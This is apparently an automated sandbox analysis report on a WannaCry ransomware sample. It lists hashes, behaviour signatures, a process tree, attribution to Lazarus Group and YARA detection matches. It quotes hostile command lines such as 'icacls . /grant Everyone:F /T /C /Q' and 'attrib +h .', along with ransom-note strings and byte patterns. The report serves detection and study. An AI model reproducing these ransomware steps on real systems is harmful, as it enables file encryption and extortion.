Edit tour

Windows Analysis Report
WannaCry_2.EXE

Overview

General Information

Sample name:	WannaCry_2.EXE
Analysis ID:	1486528
MD5:	84c82835a5d21bbcf75a61706d8ab549
SHA1:	5ff465afaabcbf0150d1a3ab2c2e74f3a4426467
SHA256:	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa
Infos:

Detection

Wannacry

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Detected Wannacry Ransomware

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Yara detected Wannacry ransomware

AI detected suspicious sample

Command shell drops VBS files

Contains functionality to detect sleep reduction / modifications

Contains functionalty to change the wallpaper

Creates files in the recycle bin to hide itself

Deletes shadow drive data (may be related to ransomware)

Drops PE files to the document folder of the user

Found Tor onion address

Found stalling execution ending in API Sleep call

Machine Learning detection for dropped file

Machine Learning detection for sample

Modifies existing user documents (likely ransomware behavior)

Writes many files with high entropy

Abnormal high CPU Usage

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality to dynamically determine API calls

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Drops PE files

Drops files with a non-matching file extension (content does not match file extension)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evaded block containing many API calls

Found evasive API chain checking for process token information

May sleep (evasive loops) to hinder dynamic analysis

PE file contains executable resources (Code or Archives)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Startup Folder File Write

Sigma detected: Uncommon Svchost Parent Process

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Stores files to the Windows start menu directory

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses cacls to modify the permissions of files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64_ra

WannaCry_2.EXE (PID: 7008 cmdline: "C:\Users\user\Desktop\WannaCry_2.EXE" MD5: 84C82835A5D21BBCF75A61706D8AB549)

dllhost.exe (PID: 7028 cmdline: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} MD5: 08EB78E5BE019DF044C26B14703BD1FA)

attrib.exe (PID: 7068 cmdline: attrib +h . MD5: 0E938DD280E83B1596EC6AA48729C2B0)

conhost.exe (PID: 7084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

icacls.exe (PID: 7076 cmdline: icacls . /grant Everyone:F /T /C /Q MD5: 2E49585E4E08565F52090B144062F97E)

conhost.exe (PID: 7092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskdl.exe (PID: 6148 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 5912 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

cmd.exe (PID: 6208 cmdline: C:\Windows\system32\cmd.exe /c 133611722583794.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 6184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cscript.exe (PID: 4304 cmdline: cscript.exe //nologo m.vbs MD5: CB601B41D4C8074BE8A84AED564A94DC)

taskdl.exe (PID: 5416 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 6064 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 4048 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 5740 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 6236 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 6292 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 6392 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 6424 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 6396 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 6364 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 6436 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 6328 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 6304 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 3760 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 4264 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 4040 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 6580 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 6560 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 6544 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 6620 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 6672 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 6656 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 6596 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 6640 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 6696 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 6764 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 6712 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 4812 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 5940 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 6256 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 6272 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 6860 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 7088 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 7156 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 7160 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 3952 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 5912 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 2920 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 5336 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 4696 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 6096 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 6240 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 6224 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 5428 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 7052 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 6244 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 6360 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 6292 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 6428 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 6384 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 1268 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 5084 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 2752 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 6524 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 6564 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

SIHClient.exe (PID: 6432 cmdline: C:\Windows\System32\sihclient.exe /cv Uh7zHirJxEOn/q4qaZ2wzQ.0.2 MD5: 8BE47315BF30475EEECE8E39599E9273)

taskdl.exe (PID: 6560 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 6616 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 6672 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

svchost.exe (PID: 6656 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

taskdl.exe (PID: 6640 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

SgrmBroker.exe (PID: 6696 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: 3BA1A18A0DC30A0545E7765CB97D8E63)

taskdl.exe (PID: 2652 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 6272 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 6148 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 532 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 2792 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 4780 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 7036 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 6244 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 6392 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 2336 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 4344 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 6400 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 6308 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 1328 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 5084 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 4040 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 1100 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 6568 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 6676 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 6668 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 2996 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 6672 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 6748 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 4812 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 5464 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 1468 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 4064 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 7104 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 1508 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 3680 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 6376 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 4048 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 7040 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 6276 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 1428 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 6412 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 3948 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 2828 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 2084 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 2464 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 6352 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 5644 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 6308 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 3760 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 3992 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 4264 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 1608 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 4132 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 1100 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 6568 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 6676 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 6664 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 6644 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 6752 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 2848 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 5856 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 4812 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 1448 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 1288 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 7104 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 1508 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 2792 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 6380 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 4184 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 7060 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 6284 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 6416 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 6392 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 4776 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 2460 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 1996 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 6468 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 6352 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 6384 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 1268 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 3704 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 7100 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 528 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 4040 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 6700 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 6704 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 6636 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 6936 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 6516 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 676 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 1364 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 2996 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 6672 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 6764 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 6264 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 6564 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 1940 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 5464 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 716 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 1460 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 1176 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 6192 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 3292 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 6724 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 1508 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 3916 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 1344 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 2664 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 3228 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 2792 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 1920 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 1868 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 2268 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 3604 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 3632 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 2352 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 2408 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 6376 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 3648 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 2876 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 4184 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 3132 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 3904 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 3640 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 6288 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 1612 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 1764 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 6392 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

@WanaDecryptor@.exe (PID: 3712 cmdline: "C:\Users\user\Desktop\@WanaDecryptor@.exe" MD5: 7BF2B57F2A205768755C07F238FB32CC)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
WannaCryptor, WannaCry, WannaCrypt		Lazarus Group	http://blog.emsisoft.com/2017/05/12/wcry-ransomware-outbreak/ http://www.independent.co.uk/news/uk/home-news/wannacry-malware-hack-nhs-report-cybercrime-north-korea-uk-ben-wallace-a8022491.html https://baesystemsai.blogspot.de/2017/05/wanacrypt0r-ransomworm.html https://blog.avast.com/ransomware-that-infected-telefonica-and-nhs-hospitals-is-spreading-aggressively-with-over-50000-attacks-so-far-today https://blog.comae.io/wannacry-decrypting-files-with-wanakiwi-demo-86bafb81112d	https://malpedia.caad.fkie.fraunhofer.de/details/win.wannacryptor

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
WannaCry_2.EXE	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
WannaCry_2.EXE	WannaCry_Ransomware	Detects WannaCry Ransomware	Florian Roth (with the help of binar.ly)	0xf4fc:$x1: icacls . /grant Everyone:F /T /C /Q 0x342d41:$x2: taskdl.exe 0x35962d:$x2: taskdl.exe 0xf4d8:$x3: tasksche.exe 0xf4b4:$x4: Global\MsWinZonesCacheCounterMutexA 0xf52c:$x5: WNcry@2ol7 0xf4fc:$x9: icacls . /grant Everyone:F /T /C /Q 0x359d91:$s2: Windows 10 --> 0xf42c:$s3: cmd.exe /c "%s" 0x41980:$s4: msg/m_portuguese.wnry 0x3591ff:$s4: msg/m_portuguese.wnry 0x2a02:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C 0x26dc:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56 0x22c8:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
WannaCry_2.EXE	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0xf4d8:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0xf500:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
WannaCry_2.EXE	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x2016:$main_2: 68 08 02 00 00 33 DB 50 53 FF 15 8C 80 40 00 68 AC F8 40 00 E8 F6 F1 FF FF 59 FF 15 6C 81 40 00 83 38 02 75 53 68 38 F5 40 00 FF 15 68 81 40 00 8B 00 FF 70 04 E8 F0 56 00 00 59 85 C0 59 75 38 ... 0x77ba:$entrypoint_all: 55 8B EC 6A FF 68 88 D4 40 00 68 F4 76 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C4 81 40 00 59 83 0D 4C F9 40 00 FF 83 0D 50 F9 40 ...

Dropped Files

Source	Rule	Description	Author	Strings
C:\@Please_Read_Me@.txt	WannaCry_RansomNote	Detects WannaCry Ransomware Note	Florian Roth	0x2c0:$s1: A: Don't worry about decryption. 0x0:$s2: Q: What's wrong with my files?
C:\@Please_Read_Me@.txt	WannaCry_RansomNote	Detects WannaCry Ransomware Note	Florian Roth	0x2c0:$s1: A: Don't worry about decryption. 0x0:$s2: Q: What's wrong with my files?
C:\@Please_Read_Me@.txt	WannaCry_RansomNote	Detects WannaCry Ransomware Note	Florian Roth	0x2c0:$s1: A: Don't worry about decryption. 0x0:$s2: Q: What's wrong with my files?
C:\@Please_Read_Me@.txt	WannaCry_RansomNote	Detects WannaCry Ransomware Note	Florian Roth	0x2c0:$s1: A: Don't worry about decryption. 0x0:$s2: Q: What's wrong with my files?
C:\@Please_Read_Me@.txt	WannaCry_RansomNote	Detects WannaCry Ransomware Note	Florian Roth	0x2c0:$s1: A: Don't worry about decryption. 0x0:$s2: Q: What's wrong with my files?
C:\Users\user\Desktop\133611722583794.bat	WannCry_BAT	Detects WannaCry Ransomware BATCH File	Florian Roth	0x2c0:$s1: A: Don't worry about decryption. 0x0:$s2: Q: What's wrong with my files?
C:\Users\user\Desktop\133611722583794.bat	WannCry_BAT	Detects WannaCry Ransomware BATCH File	Florian Roth	0x2c0:$s1: A: Don't worry about decryption. 0x0:$s2: Q: What's wrong with my files?
C:\Users\user\Desktop\133611722583794.bat	WannCry_BAT	Detects WannaCry Ransomware BATCH File	Florian Roth	0x2c0:$s1: A: Don't worry about decryption. 0x0:$s2: Q: What's wrong with my files?
C:\Users\user\Desktop\133611722583794.bat	WannCry_BAT	Detects WannaCry Ransomware BATCH File	Florian Roth	0x2c0:$s1: A: Don't worry about decryption. 0x0:$s2: Q: What's wrong with my files?
C:\Users\user\Desktop\133611722583794.bat	WannCry_BAT	Detects WannaCry Ransomware BATCH File	Florian Roth	0x2c0:$s1: A: Don't worry about decryption. 0x0:$s2: Q: What's wrong with my files?
C:\Users\user\Desktop\133611722583794.bat	WannCry_BAT	Detects WannaCry Ransomware BATCH File	Florian Roth	0x2c0:$s1: A: Don't worry about decryption. 0x0:$s2: Q: What's wrong with my files?
C:\Users\user\Desktop\133611722583794.bat	WannCry_BAT	Detects WannaCry Ransomware BATCH File	Florian Roth	0x2c0:$s1: A: Don't worry about decryption. 0x0:$s2: Q: What's wrong with my files?
